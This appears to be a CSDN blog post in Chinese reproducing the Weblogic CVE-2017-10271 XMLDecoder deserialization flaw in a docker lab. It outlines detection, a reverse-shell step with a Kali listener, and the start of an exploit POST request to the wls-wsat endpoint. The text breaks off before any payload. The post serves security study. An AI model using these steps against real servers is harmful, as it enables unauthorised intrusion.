Weblogic--CVE-2017-10271

本文详细介绍了Weblogic版本低于10.3.6时,'wls-wsat'组件中的XMLDecoder反序列化漏洞(CVE-2017-10271)。通过环境搭建和漏洞复现步骤,展示了如何利用该漏洞执行任意命令,包括反弹shell的过程。内容包括启动测试环境、发送恶意数据包以及监听和接收shell的步骤。
摘要由CSDN通过智能技术生成

Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞(CVE-2017-10271)

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

环境搭建

启动测试环境:

docker-compose up -d

等待一段时间,访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动。

漏洞复现

发送如下数据包(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误):

漏洞检测
在这里插入图片描述
漏洞利用,反弹shell
在kali监听
在这里插入图片描述
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.88.148:7001
Accept-Encoding: gzip, deflate
Accept:

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值